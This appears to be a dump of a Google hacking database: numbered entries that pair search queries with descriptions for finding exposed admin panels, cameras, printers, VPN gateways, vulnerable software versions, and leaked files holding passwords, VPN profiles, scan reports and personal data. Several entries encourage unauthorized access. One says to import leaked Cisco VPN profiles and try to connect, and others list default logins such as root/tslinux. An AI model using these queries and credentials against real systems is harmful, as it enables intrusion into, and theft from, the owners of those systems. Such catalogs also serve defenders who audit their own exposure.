[[url]http://www.google.com/search?q=intitle:%22inc.+vpn+3000+concentrator%22&num=30&hl=en&lr=&safe=off&client=firefox-a&rls=org.mozilla:en-US:official&filter=0[url]] [[dork]intitle:"inc. vpn 3000 concentrator"[dork]] [end][1167]] [[start][1168] [[title]Winamp Web Interface[[title]] [[descr]Just a bit of fun, should reveal a few instances of a Winamp HTTP control program. Without login, you can't do much except see the currently playing track. With login you can have a bit more fun by changing the volume, currently playing track, viewing playlists, etc. With admin access you can delete tracks... 
I'll leave it to others to find out if anything cool can be done with this.

Just a note: you *can't* hear the music the person is playing; it's not a stream interface, just a control interface.[descr]] [[url]http://www.google.com/search?q=%22About+Winamp+Web+Interface%22+intitle%3A%22Winamp+Web+Interface%22&btnG=Search[url]] [[dork]"About Winamp Web Interface" intitle:"Winamp Web Interface"[dork]] [end][1168]] [[start][1169] [[title]intitle:ilohamail intext:"Version 0.8.10" "Powered by IlohaMail"[title]] [[descr]Some versions of IlohaMail are vulnerable.[descr]] [[url]http://www.google.com/search?q=intitle%3Ailohamail+intext%3A%22Version+0.8.10%22+%22Powered+by+IlohaMail%22&btnG=Search[url]] [[dork]intitle:ilohamail intext:"Version 0.8.10" "Powered by IlohaMail"[dork]] [end][1169]] [[start][1172] [[title]intitle:ilohamail "Powered by IlohaMail"[title]] [[descr]IlohaMail is a light-weight yet feature-rich multilingual webmail system designed for ease of use, written in pure PHP. It supports web access to IMAP and POP3 accounts, and includes a complete contacts feature and other PIM features.[descr]] [[url]http://www.google.com/search?q=intitle%3Ailohamail+%22Powered+by+IlohaMail%22&btnG=Search[url]] [[dork]intitle:ilohamail "Powered by IlohaMail"[dork]] [end][1172]] [[start][1179] [[title]intitle:"NeroNET - burning online"[title]] [[descr]NeroNET is an online burning device by Nero. Basically, with this query you'll get a listing of active servers running the software. You can only do things like view active jobs and users and see what disc the server is burning. However, if you manage to log in as the Administrator you can have a bit more fun, like changing the server and recording settings. 
Well, they were smart enough to conveniently place the default password within the software's manual.[descr]] [[url]http://www.google.com/search?q=intitle%3ANeroNET+-+burning+online[url]] [[dork]intitle:NeroNET - burning online[dork]] [end][1179]] [[start][1181] [[title]"Parse error: parse error, unexpected T_VARIABLE" "on line" filetype:php[[title]] [[descr]PHP error with a full web root path disclosure[descr]] [[url]http://www.google.com/search?q=%22Parse+error:+parse+error,+unexpected+T_VARIABLE%22+%22on+line%22+filetype:php[url]] [[dork]"Parse error: parse error, unexpected T_VARIABLE" "on line" filetype:php[dork]] [end][1181]] [[start][1182] [[title]"MacHTTP" filetype:log inurl:machttp.log[[title]] [[descr]MacHTTP is a webserver for Macs running OS 6-9.x. It's pretty good for older Macs, but the default install leaves the MacHTTP.log file open to access.
[descr]] [[url]http://www.google.com/search?q=%22MacHTTP%22+filetype%3Alog+inurl%3Amachttp.log[url]] [[dork]"MacHTTP" filetype:log inurl:machttp.log[dork]] [end][1182]] [[start][1184] [[title]ext:plist filetype:plist inurl:bookmarks.plist[[title]] [[descr]These Safari bookmarks might show very interesting info about a user's surfing habits.[descr]] [[url]http://www.google.com/search?q=ext%3Aplist+filetype%3Aplist+inurl%3Abookmarks.plist[url]] [[dork]ext:plist filetype:plist inurl:bookmarks.plist[dork]] [end][1184]] [[start][1185] [[title]ext:ics ics[[title]] [[descr]iCalendar files that can contain a lot of useful information about a possible target.[descr]] [[url]http://www.google.com/search?q=ext%3Aics+ics[url]] [[dork]ext:ics ics[dork]] [end][1185]] [[start][1186] [[title]intitle:"Default PLESK Page"[title]] [[descr]Plesk Server Administrator (PSA) is web-based software that enables remote administration of web servers. It can be used on Linux and other systems that support PHP.

The default page is an indication that no configuration has been done (yet) for the domain.[descr]] [[url]http://www.google.com/search?q=intitle:%22Default%20PLESK%20Page%22&filter=0[url]] [[dork]intitle:"Default PLESK Page"[dork]] [end][1186]] [[start][1187] [[title]intitle:"Zope Help System" inurl:HelpSys[[title]] [[descr]By itself, this returns Zope's help pages. Manipulation of the URL, changing 'HelpSys' to 'manage', gives a link to a server's Zope Management Interface. While this requires authentication, sometimes overly revealing error messages are returned.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22Zope+Help+System%22+inurl%3AHelpSys[url]] [[dork]intitle:"Zope Help System" inurl:HelpSys[dork]] [end][1187]] [[start][1189] [[title]ext:jbf jbf[[title]] [[descr]There is a full path disclosure in .jbf files (Paint Shop Pro), which by itself is not a vulnerability, but it becomes interesting when uploaded to or used on webservers. Use a tool like 'strings' to read the ASCII parts; the path is at the top of the file.[descr]] [[url]http://www.google.com/search?q=ext%3Ajbf+jbf[url]] [[dork]ext:jbf jbf[dork]] [end][1189]] [[start][1190] [[title]"Please use Netscape 2.0 or enhance !!" -site:dlink.com -site:ovislink.com.tw[[title]] [[descr]A search for some HTML code used in a variety of D-Link network devices (webcams and such).[descr]] [[url]http://www.google.com/search?q=%22Please+use+Netscape+2.0+or+enhance+!!%22+-site:dlink.com+-site:ovislink.com.tw&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]"Please use Netscape 2.0 or enhance !!" -site:dlink.com -site:ovislink.com.tw[dork]] [end][1190]] [[start][1197] [[title]intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin - sfx_local" | intitle:"SFXAdmin - sfx_test"[title]] [[descr]Just another logon page search, this one for SFX®, a link server from Ex Libris that delivers linking services in the scholarly information environment. 
SFX is also a component in the management of electronic resources in a library. [descr]] [[url]http://www.google.com/search?q=intitle:%22SFXAdmin+-+sfx_global%22+%7C+intitle:%22SFXAdmin+-+sfx_local%22+%7C+intitle:%22SFXAdmin+-+sfx_test%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin - sfx_local" | intitle:"SFXAdmin - sfx_test"[dork]] [end][1197]] [[start][1198] [[title] intitle:"Welcome to the Advanced Extranet Server, ADVX!"[title]] [[descr]Webserver detection: The Advanced Extranet Server project aims to create an extensible open source web server based on Apache.[descr]] [[url]http://www.google.com/search?q=intitle:%22Welcome%20to%20the%20Advanced%20Extranet%20Server,%20ADVX!%22[url]] [[dork]intitle:"Welcome to the Advanced Extranet Server, ADVX!"[dork]] [end][1198]] [[start][1199] [[title]inurl:cgi-bin inurl:bigate.cgi[[title]] [[descr]Anonymous surfing with bigate.cgi. Remove http:// when you copy paste or it won't work.[descr]] [[url]http://www.google.com/search?q=inurl:cgi-bin+inurl:bigate.cgi&num=100&hl=en&lr=&c2coff=1&safe=off&filter=1[url]] [[dork]inurl:cgi-bin inurl:bigate.cgi[dork]] [end][1199]] [[start][1200] [[title][[title]] [[descr][descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1200]] [[start][1201] [[title]ext:dhtml intitle:"document centre|(home)" OR intitle:"xerox"[title]] [[descr]Various Online Devices>Xerox (*Centre)
[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&newwindow=1&q=ext%3Adhtml+intitle%3A%22document+centre%7C%28home%29%22+OR+intitle%3A%22xerox%22[url]] [[dork]ext:dhtml intitle:"document centre|(home)" OR intitle:"xerox"[dork]] [end][1201]] [[start][1203] [[title]ext:DBF DBF[[title]] [[descr]dBase database file. Can contain sensitive data like any other database.[descr]] [[url]http://www.google.com/search?q=ext%3ADBF+DBF&hl=en&lr=[url]] [[dork]ext:DBF DBF[dork]] [end][1203]] [[start][1204] [[title]ext:CDX CDX[[title]] [[descr]Visual FoxPro database index[descr]] [[url]http://www.google.com/search?q=ext:CDX+CDX&hl=en&lr=&start=0&sa=N[url]] [[dork]ext:CDX CDX[dork]] [end][1204]] [[start][1205] [[title]ext:ccm ccm -catacomb[[title]] [[descr]Lotus cc:Mail Mailbox file[descr]] [[url]http://www.google.com/search?q=ext:ccm+ccm+-catacomb[url]] [[dork]ext:ccm ccm -catacomb[dork]] [end][1205]] [[start][1206] [[title]ext:DCA DCA[[title]] [[descr]IBM DisplayWrite Document Content Architecture Text File[descr]] [[url]http://www.google.com/search?q=ext:DCA+DCA&hl=en&lr=&start=0&sa=N[url]] [[dork]ext:DCA DCA[dork]] [end][1206]] [[start][1207] [[title][[title]] [[descr][descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1207]] [[start][1208] [[title]intitle:"ERROR: The requested URL could not be retrieved" "While trying to retrieve the URL" "The following error was encountered:"[title]] [[descr]Squid error messages, most likely from reverse proxy servers. 
[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22ERROR%3A+The+requested+URL+could+not+be+retrieved%22+%22While+trying+to+retrieve+the+URL%22+%22The+following+error+was+encountered%22[url]] [[dork]intitle:"ERROR: The requested URL could not be retrieved" "While trying to retrieve the URL" "The following error was encountered"[dork]] [end][1208]] [[start][1209] [[title]!Host=*.* intext:enc_UserPassword=* ext:pcf[[title]] [[descr]Some people actually keep their VPN profiles on the internet... omg... Simply download the pcf file, import it into your Cisco VPN client and try to connect.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%21Host%3D*.*+intext%3Aenc_UserPassword%3D*++ext%3Apcf&btnG=Search[url]] [[dork]!Host=*.* intext:enc_UserPassword=* ext:pcf[dork]] [end][1209]] [[start][1210] [[title]intitle:"Welcome To Your WebSTAR Home Page"[title]] [[descr]This is the default page for the WebSTAR (Macintosh) web server (headers say --> Server: WebSTAR NetCloak). [descr]] [[url]http://www.google.com/search?q=intitle:%22Welcome+To+Your+WebSTAR+Home+Page%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]intitle:"Welcome To Your WebSTAR Home Page"[dork]] [end][1210]] [[start][1211] [[title]"Powered by DWMail" password intitle:dwmail[[title]] [[descr]What is DWmail™? DWmail™ is an 'intelligent' web-based email application written in the scripting language PHP. DWmail™ allows you and your visitors to access, manage and send email using any POP3 or IMAP4 compliant email account. Simply enter your email address and password to check your email.[descr]] [[url]http://www.google.com/search?q=%22Powered+by+DWMail%22+password+intitle%3Adwmail&btnG=Search[url]] [[dork]"Powered by DWMail" password intitle:dwmail[dork]] [end][1211]] [[start][1212] [[title]inurl:gnatsweb.pl[[title]] [[descr]GNU GNATS is a set of tools for tracking bugs reported by users to a central site. 
It allows problem report management and communication with users via various means. GNATS stores all the information about problem reports in its databases and provides tools for querying, editing, and maintenance of the databases. [descr]] [[url]http://www.google.com/search?q=inurl%3Agnatsweb.pl[url]] [[dork]inurl:gnatsweb.pl[dork]] [end][1212]] [[start][1213] [[title]intitle:"site administration: please log in" "site designed by emarketsouth"[title]] [[descr]Real Estate software package, with the admin login screen[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1213]] [[start][1214] [[title]welcome.to phpqladmin "Please login" -cvsweb[[title]] [[descr]phpQLAdmin is a web administration tool for LDAP similar to phpMyAdmin. [descr]] [[url]http://www.google.com/search?q=welcome.to+phpqladmin++%22Please+login%22+-cvsweb&btnG=Search[url]] [[dork]welcome.to phpqladmin "Please login" -cvsweb[dork]] [end][1214]] [[start][1215] [[title]intitle:"YALA: Yet Another LDAP Administrator"[title]] [[descr]YALA is a web-based LDAP administration GUI. The idea is to simplify the directory administration with a graphical interface and neat features, though to stay a general-purpose program
The goal is to simplify the administration but not to make the YALA user stupid: to achieve this, we try to show the user what YALA does behind the scenes, what it sends to the server. [descr]] [[url]http://www.google.com/search?q=intitle%3A%22YALA%3A+Yet+Another+LDAP+Administrator%22&btnG=Search[url]] [[dork]intitle:"YALA: Yet Another LDAP Administrator"[dork]] [end][1215]] [[start][1216] [[title]intitle:open-xchange inurl:login.pl[[title]] [[descr]Open-Xchange 5 is a high performance substitute for costly and inflexible Microsoft Exchange deployments -- with the full functionality of a mature collaboration platform. OX 5 will not only manage appointments and tasks, it will take care of email, calendar, contacts, to-do's, projects, documents, search and forums. With OX, you can manage information using bookmarks that are linked to a wide variety of data objects, such as emails, spreadsheets and/or presentations. Open-Xchange 5 allows you to connect to Microsoft Outlook and devices using the Palm OS. Based on proven open source technologies, OX 5 offers best-of-class security through anti-virus and anti-spam utilities. 
[descr]] [[url]http://www.google.com/search?q=intitle:open-xchange+inurl:login.pl[url]] [[dork]intitle:open-xchange inurl:login.pl[dork]] [end][1216]] [[start][1217] [[title]intitle:"Document title goes here" intitle:"used by web search tools" " example of a simple Home Page"[title]] [[descr]IBM HTTP Server (AS/400)[descr]] [[url]http://www.google.com/search?q=intitle:%22Document+title+goes+here%22+intitle:%22used+by+web+search+tools%22+%22+example+of+a+simple+Home+Page%22&hl=en&lr=&c2coff=1&filter=0[url]] [[dork]intitle:"Document title goes here" intitle:"used by web search tools" " example of a simple Home Page"[dork]] [end][1217]] [[start][1218] [[title]intitle:"WorldClient" intext:"© (2003|2004) Alt-N Technologies."[title]] [[descr]MDaemon, Windows-based email server software, contains full mail server functionality and control with a strong emphasis on security to protect your email communication needs.

[descr]] [[url]http://www.google.com/search?q=intitle%3A%22WorldClient%22+intext%3A%22%C2%A9+%282003%7C2004%29+Alt-N+Technologies.%22[url]] [[dork]intitle:"WorldClient" intext:"© (2003|2004) Alt-N Technologies."[dork]] [end][1218]] [[start][1219] [[title]intitle:"Freifunk.Net - Status" -site:commando.de[[title]] [[descr]Hacked WRT54G Freifunk firmware. The router is based on Linux, so under the GPL the source code must be published. Some guys from freifunk.net have modified it for their needs.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22Freifunk.Net+-+Status%22+-site%3Acommando.de[url]] [[dork]intitle:"Freifunk.Net - Status" -site:commando.de[dork]] [end][1219]] [[start][1220] [[title]intitle:index.of WEB-INF[[title]] [[descr]Finds Java-powered web servers which have directory indexing enabled on their config directory.[descr]] [[url]http://www.google.com/search?q=%0D%0Aintitle%3Aindex.of+WEB-INF[url]] [[dork] intitle:index.of WEB-INF[dork]] [end][1220]] [[start][1221] [[title]inurl:"port_255" -htm[[title]] [[descr]Another way to dig up some not-yet-dorked Lexmark and a couple of Dell printers.

http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=2177[descr]] [[url]http://www.google.com/search?q=inurl%3A%22port_255%22+-htm&btnG=Google+Search[url]] [[dork]inurl:"port_255" -htm[dork]] [end][1221]] [[start][1222] [[title]intitle:"SWW link" "Please wait....."[title]] [[descr]Zyxel Zywall[descr]] [[url]http://www.google.com/search?q=intitle:%22SWW+link%22+%22Please+wait.....%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]intitle:"SWW link" "Please wait....."[dork]] [end][1222]] [[start][1249] [[title]ext:nbe nbe[[title]] [[descr]This search yields Nessus scan reports. Even if some of the vulnerabilities have been fixed, we can still gather valuable information about the network/hosts. This also works with ISS and any other vulnerability scanner which produces reports in HTML or text format.[descr]] [[url]http://www.google.com/search?q=ext%3Anbe+nbe[url]] [[dork]ext:nbe nbe[dork]] [end][1249]] [[start][1250] [[title]inurl:server.cfg rcon password[[title]] [[descr]Counter-Strike rcon passwords, saved in the server.cfg. [descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1250]] [[start][1251] [[title]intitle:"myBloggie 2.1.1..2 - by myWebland"[title]] [[descr]myBloggie is affected by multiple vulnerabilities.


http://www.securityfocus.com/bid/13507[descr]] [[url]http://www.google.com/search?q=intitle%3A%22myBloggie+2.1.1..2+-+by+myWebland%22[url]] [[dork]intitle:"myBloggie 2.1.1..2 - by myWebland"[dork]] [end][1251]] [[start][1252] [[title]intext:"powered by EZGuestbook"[title]] [[descr]HTMLJunction EZGuestbook is prone to a database disclosure vulnerability. Remote users may download the database

http://www.securityfocus.com/bid/13543/info/

[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1252]] [[start][1253] [[title]inurl::2082/frontend -demo[[title]] [[descr]This allows you access to CPanel login dialogues/screens.

[descr]] [[url]http://www.google.com/search?q=inurl%3A%3A2082%2Ffrontend+-demo[url]] [[dork]inurl::2082/frontend -demo[dork]] [end][1253]] [[start][1255] [[title]intitle:"osTicket :: Support Ticket System"[title]] [[descr]osTicket is a widely-used open source support ticket system. It is a lightweight support ticket tool written mainly using PHP scripting language. There are several vulnerabilities in the osTicket software that may allow for an attacker to take control of the affected web server, disclose sensitive data from the database, or read arbitrary files. These issues have been reported to the developers and a new updated version of osTicket is available for download. All affected users should upgrade their osTicket installations immediately.

http://www.addict3d.org/index.php?page=viewarticle&type=security&ID=3882
[descr]] [[url]http://www.google.com/search?q=intitle%3A%22osTicket+%3A%3A+Support+Ticket+System%22+&btnG=Search[url]] [[dork]intitle:"osTicket :: Support Ticket System" [dork]] [end][1255]] [[start][1256] [[title]intext:"Powered by: Adobe PrintGear" inurl:admin[[title]] [[descr]Printers equipped with Adobe's PrintGear technology

Adobe's PrintGear technology is a new printing architecture designed specifically for low-cost, high-quality output. At the core of this architecture is a custom chip, the PrintGear Imaging Processor (or PrintGear processor for short). This processor supplies the performance required for high-resolution output, yet helps keep the overall cost of the output device low.
[descr]] [[url]http://www.google.com/search?q=intext%3A%22Powered+by%3A+Adobe+PrintGear%22+inurl%3Aadmin+&btnG=Search[url]] [[dork]intext:"Powered by: Adobe PrintGear" inurl:admin [dork]] [end][1256]] [[start][1257] [[title]intitle:"--- VIDEO WEB SERVER ---" intext:"Video Web Server" "Any time & Any where" username password[[title]] [[descr]AVTech Video Web Server is a surveillance product that is directly connected to the internet. It enables the AVTech DVR series products or any camera to connect to the Internet for remote monitoring or remote control. Besides that, it can also connect 2 video inputs to the Internet for remote monitoring and recording.
Besides the web interface it also offers an FTP server.
[descr]] [[url]http://www.google.com/search?q=%0D%0Aintitle:%22---+VIDEO+WEB+SERVER+---%22+intext:%22Video+Web+Server%22+%22Any+time+%26+Any+where%22+username+password+&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork] intitle:"--- VIDEO WEB SERVER ---" intext:"Video Web Server" "Any time & Any where" username password [dork]] [end][1257]] [[start][1271] [[title]inurl:start.htm?scrw=[[title]] [[descr]VPON (Video Picture On Net) is a video surveillance setup which seems to be used by a lot of businesses. In the FAQ posted on their site (http://www.aegismicro.com/navigation/indexsuppfaq.htm) they show a default username/password of webmonitor/oyo.

=)[descr]] [[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=DVXA,DVXA:2005-16,DVXA:en&q=inurl%3Astart%2Ehtm%3Fscrw%3D[url]] [[dork]inurl:start.htm?scrw=[dork]] [end][1271]] [[start][1272] [[title]intitle:"Welcome to 602LAN SUITE *"[title]] [[descr]The 602LAN SUITE runs on a webserver called WEB602/1.04 and includes webmail.[descr]] [[url]http://www.google.com/search?q=intitle:%22Welcome+to+602LAN+SUITE+*%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]intitle:"Welcome to 602LAN SUITE *"[dork]] [end][1272]] [[start][1273] [[title][[title]] [[descr][descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1273]] [[start][1274] [[title]intitle:"InterJak Web Manager"[title]] [[descr]A router device by Uroam (formerly FilaNet), with email and VPN possibilities.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22InterJak+Web+Manager%22&btnG=Search[url]] [[dork]intitle:"InterJak Web Manager"[dork]] [end][1274]] [[start][1275] [[title]inurl:sphpblog intext:"Powered by Simple PHP Blog 0.4.0"[title]] [[descr]Simple PHP Blog is vulnerable to multiple attacks:

Vulnerabilities:
~~~~~~~~~~~~~~~~
A. Full Path disclosures
B. XSS in search.php
C. Critical Information disclosures

http://www.securityfocus.com/archive/1/395994[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1275]] [[start][1276] [[title]intitle:"SSHVnc Applet"OR intitle:"SSHTerm Applet" -uni-klu.ac.at -net/viewcvs.py -iphoting.iphoting.com[[title]] [[descr]SSHTerm Applet and SSHVnc Applet pages.[descr]] [[url]http://www.google.com/search?q=intitle:%22SSHVnc+Applet%22OR+intitle:%22SSHTerm+Applet%22+-uni-klu.ac.at+-net/viewcvs.py+-iphoting.iphoting.com&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]intitle:"SSHVnc Applet"OR intitle:"SSHTerm Applet" -uni-klu.ac.at -net/viewcvs.py -iphoting.iphoting.com[dork]] [end][1276]] [[start][1279] [[title]"To view the Web interface of the SpeedTouch, JavaScript must be supported and enabled on your browser!" -site:webblernet.nl -site:ihackstuff.com -sit[[title]] [[descr]SpeedTouch 510 DSL modem devices that were once unprotected. That may have changed by now.[descr]] [[url]http://www.google.com/search?q=%22To+view+the+Web+interface+of+the+SpeedTouch,+JavaScript+must+be+supported+and+enabled+on+your+browser!%22+-site:webblernet.nl+-site:ihackstuff.com+-site:blogspot.com&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]"To view the Web interface of the SpeedTouch, JavaScript must be supported and enabled on your browser!" -site:webblernet.nl -site:ihackstuff.com -site:blogspot.com[dork]] [end][1279]] [[start][1280] [[title](intitle:"502 Proxy Error")|(intitle:"503 Proxy Error") "The proxy server could not handle the request" -topic -mail -4suite -list -site:geocrawler.co[[title]] [[descr]A reverse proxy is a gateway for servers, and enables one web server to provide content from another transparently. These are often implemented to improve security or performance.
[descr]] [[url]http://www.google.com/search?q=%28intitle%3A%22502+Proxy+Error%22%29%7C%28intitle%3A%22503+Proxy+Error%22%29+%22The+proxy+server+could+not+handle+the+request%22+-topic+-mail+-4suite+-list+-site%3Ageocrawler.com+-site%3Aelitesecurity.org&btnG=Search[url]] [[dork](intitle:"502 Proxy Error")|(intitle:"503 Proxy Error") "The proxy server could not handle the request" -topic -mail -4suite -list -site:geocrawler.com -site:elitesecurity.org[dork]] [end][1280]] [[start][1281] [[title]intitle:"Dell *" inurl:port_0[[title]] [[descr]A few online Dell printers: status, paper, toner levels, IPs, MACs, the usual. (Lexmark and Dell seem to share the same embedded webserver; try changing the vendor name.)[descr]] [[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=intitle%3A%22Dell+*%22+inurl%3Aport_0&btnG=Google+Search[url]] [[dork]intitle:"Dell *" inurl:port_0[dork]] [end][1281]] [[start][1282] [[title]intext:"powered by Hosting Controller" intitle:Hosting.Controller[[title]] [[descr]Description:
==============
Hosting Controller is a complete array of Web hosting automation tools for the Windows Server family platform. It is the only multilingual software package you need to put your Web hosting business on autopilot.

The HC has its own complete billing solution which is tightly integrated within Control Panel & does all the invoicing & billing.

Vuln:
======
A remote authenticated user can invoke 'resellerdefaults.asp' to view reseller add-on plans and then load the following type of URL to view the details of a target reseller's plans:

The 'resellerresources.asp' script does not properly validate user-supplied input in the 'resourceid' parameter. A remote authenticated user can supply specially crafted parameter values to execute SQL commands on the underlying database. This can be exploited, for example, to delete a reseller add-on plan.


More on Vuln/Exploit
====================
http://securitytracker.com/alerts/2005/May/1014071.html[descr]] [[url]http://www.google.com/search?hl=en&q=intext%3A%22powered+by+Hosting+Controller%22+intitle%3AHosting.Controller+&filter=0[url]] [[dork]intext:"powered by Hosting Controller" intitle:Hosting.Controller [dork]] [end][1282]] [[start][1283] [[title]intitle:"PacketShaper Customer Login"[title]] [[descr]PacketShaper Login.

Provides login access for PacketShaper customers.[descr]] [[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=intitle%3A%22PacketShaper+Customer+Login%22+&btnG=Google+Search[url]] [[dork]intitle:"PacketShaper Customer Login" [dork]] [end][1283]] [[start][1284] [[title]( intitle:"PacketShaper Login")|(intitle:"PacketShaper Customer Login")[[title]] [[descr]Packeteer's PacketShaper is an application traffic management system that monitors, controls, and accelerates application performance over the WAN and Internet.[descr]] [[url]http://www.google.com/search?q=(+intitle:%22PacketShaper+Login%22)%7C(intitle:%22PacketShaper+Customer+Login%22)&num=100&hl=en&lr=&c2coff=1&filter=0[url]] [[dork]( intitle:"PacketShaper Login")|(intitle:"PacketShaper Customer Login")[dork]] [end][1284]] [[start][1285] [[title]inurl:Citrix/MetaFrame/default/default.aspx[[title]] [[descr]MetaFrame Presentation Server[descr]] [[url]http://www.google.com/search?hl=en&lr=&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=inurl%3ACitrix%2FMetaFrame%2Fdefault%2Fdefault.aspx&btnG=Search[url]] [[dork]inurl:Citrix/MetaFrame/default/default.aspx[dork]] [end][1285]] [[start][1286] [[title]inurl:exchweb/bin/auth/owalogon.asp[[title]] [[descr]Outlook Web Access Login Portal[descr]] [[url]http://www.google.com/search?hl=en&q=inurl%3Aexchweb%2Fbin%2Fauth%2Fowalogon.asp&btnG=Google+Search[url]] [[dork]inurl:exchweb/bin/auth/owalogon.asp[dork]] [end][1286]] [[start][1290] [[title]inurl:/SUSAdmin intitle:"Microsoft Software Update Services"[title]] [[descr]Microsoft SUS Server is a patch management tool for Windows 2000, XP and 2003 systems.
It can be used to gain access to a patch deployment server. If you successfully log in to that server you can possibly compromise all the other network servers.

[descr]] [[url]http://www.google.com/search?q=inurl%3A%2FSUSAdmin+intitle%3A%22Microsoft+Software+Update+Services%22&btnG=Search[url]] [[dork]inurl:/SUSAdmin intitle:"Microsoft Software Update Services"[dork]] [end][1290]] [[start][1291] [[title]intitle:"Netopia Router (*.)""to view this site"[title]] [[descr]Web admin for netopia routers

This Web tool provides access to information about the current status of your router and connections. [descr]] [[url]http://www.google.com/search?q=intitle:%22Netopia+Router+(*.)%22%22to+view+this+site%22&filter=0[url]] [[dork]intitle:"Netopia Router (*.)""to view this site"[dork]] [end][1291]] [[start][1296] [[title]intitle:"VisNetic WebMail" inurl:"/mail/"[title]] [[descr]VisNetic WebMail is a built-in web mail server that allows VisNetic Mail Server account holders to access their email messages, folders and address books from any standard web browser on an Internet enabled computer.[descr]] [[url]http://www.google.com/search?q=intitle:%22VisNetic+WebMail%22+inurl:%22/mail/%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]intitle:"VisNetic WebMail" inurl:"/mail/"[dork]] [end][1296]] [[start][1297] [[title]inurl:perform.ini filetype:ini[[title]] [[descr]mIRC Passwords For Nicks & Channels
In the channel\[chanfolder] section of mirc.ini you can find two types of "private" information: secret channels (that is, +ps channels that are not listed everywhere) and password-protected channels (passwords are stored in plaintext).
[descr]] [[url]http://www.google.com/search?q=inurl:perform.ini+filetype:ini[url]] [[dork]inurl:perform.ini filetype:ini[dork]] [end][1297]] [[start][1298] [[title](cam1java)|(cam2java)|(cam3java)|(cam4java)|(cam5java)|(cam6java) -navy.mil -backflip -power.ne.jp[[title]] [[descr]KPIX Java-based traffic cameras. Based at CBS Broadcasting for San Francisco, Oakland, and San Jose.[descr]] [[url]http://www.google.com/search?q=(cam1java)%7C(cam2java)%7C(cam3java)%7C(cam4java)%7C(cam5java)%7C(cam6java)+-navy.mil+-backflip+-power.ne.jp&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork](cam1java)|(cam2java)|(cam3java)|(cam4java)|(cam5java)|(cam6java) -navy.mil -backflip -power.ne.jp[dork]] [end][1298]] [[start][1299] [[title]allintitle:"Welcome to the Cyclades"[title]] [[descr]This search reveals the login page for the Cyclades TS1000 and TS2000 Web Management Service. The Cyclades TS1000 and TS2000 devices are console servers, based on a cut-down Linux version. These lovely devices sit on the network with console cables attached to them, so that once you gain access to this device, you then have console access to any of the hosts connected to the console ports. :-)

The default username and password for these devices is, root/tslinux.

This query currently only returns pages available in Google's cache (but in the future more devices may be returned).[descr]] [[url]http://www.google.com/search?hl=en&q=allintitle%3A%22Welcome+to+the+Cyclades%22&btnG=Google+Search&meta=[url]] [[dork]allintitle:"Welcome to the Cyclades"[dork]] [end][1299]] [[start][1301] [[title]intext:"Powered by X-Cart: shopping cart software" -site:x-cart.com[[title]] [[descr]X-Cart (version 4.0.8) has multiple input validation vulnerabilities. There doesn't seem to be any way to search for specific versions of the software with Google. See http://www.securitytracker.com/alerts/2005/May/1014077.html for more information.
[descr]] [[url]http://www.google.com/search?hl=en&lr=&safe=off&c2coff=1&q=intext%3A%22Powered+by+X-Cart%3A+shopping+cart+software%22+-site%3Ax-cart.com&btnG=Search[url]] [[dork]intext:"Powered by X-Cart: shopping cart software" -site:x-cart.com[dork]] [end][1301]] [[start][1302] [[title]intitle:"PowerDownload" ("PowerDownload v3.0.2 ©" | "PowerDownload v3.0.3 ©" ) -site:powerscripts.org[[title]] [[descr]The PowerDownload program (version 3.0.2 and 3.0.3) contains a serious vulnerability. Vulnerability discovery: SoulBlack - Security Research (http://soulblack.com.ar)
Date: 05/31/2005
Severity: High. Remote Users Can Execute Arbitrary Code.
Affected version: v3.0.2 & v3.0.3
vendor: http://www.powerscripts.org/

* Fix *
Contact the Vendor

* References *
http://www.soulblack.com.ar/repo/papers/advisory/powerdownload_advisory.txt[descr]] [[url]http://www.google.com/search?q=intitle:%22PowerDownload%22+(%22PowerDownload+v3.0.2+©%22+%7C+%22PowerDownload+v3.0.3+©%22+)+-site:powerscripts.org[url]] [[dork]intitle:"PowerDownload" ("PowerDownload v3.0.2 ©" | "PowerDownload v3.0.3 ©" ) -site:powerscripts.org[dork]] [end][1302]] [[start][1303] [[title]intitle:"PHPstat" intext:"Browser" intext:"PHPstat setup"[title]] [[descr]PHPstat shows nice statistical information about a website's visitors. Certain versions also contain vulnerabilities: http://www.soulblack.com.ar/repo/papers/advisory/PhpStat_advisory.txt
